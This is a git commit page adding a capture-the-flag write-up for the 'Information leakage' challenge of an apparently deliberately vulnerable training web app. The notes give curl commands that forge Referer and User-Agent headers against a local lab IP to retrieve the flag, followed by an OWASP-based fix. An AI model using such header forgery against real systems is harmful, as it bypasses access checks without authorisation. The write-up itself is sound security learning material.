diff options
| author | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 11:52:59 +0100 |
|---|---|---|
| committer | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 11:52:59 +0100 |
| commit | 7c6e2149b4e21c82e174f1e2b3b98357a69dfb59 (patch) | |
| tree | 29a0c64e40e2931d3e983629adec40e2d681cdc2 /Information leakage/Resources | |
| parent | 3b584164fba5d88866d84f1ce2bbe26e473b58b7 (diff) | |
| download | darkly-7c6e2149b4e21c82e174f1e2b3b98357a69dfb59.tar.gz darkly-7c6e2149b4e21c82e174f1e2b3b98357a69dfb59.zip | |
Add information leakage solution
Diffstat (limited to 'Information leakage/Resources')
| -rw-r--r-- | Information leakage/Resources/notes.md | 12 |
1 files changed, 12 insertions, 0 deletions
diff --git a/Information leakage/Resources/notes.md b/Information leakage/Resources/notes.md new file mode 100644 index 0000000..9f13add --- /dev/null +++ b/Information leakage/Resources/notes.md @@ -0,0 +1,12 @@ +## Exploit + +1. Found a comment saying `You must come from : "https://www.nsa.gov/` +1. Since one cannot edit the **Referer** header in Firefox, I used `curl --header "Referer: https://www.nsa.gov" "http://10.0.2.15/?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f"` +1. Found another comment in the returned page: `Let's use this browser : "ft_bornToSec". It will help you a lot.` +1. Added a `User-Agent` header `ft_bornToSec` and found the flag. Complete command: `curl --header "User-Agent: ft_bornToSec" --header "Referer: https://www.nsa.gov/" "http://10.0.2.15/index.php?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f" | grep "The flag"` + +## Fix + +[https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage]() + +Don't put sensitive information in HTML code. |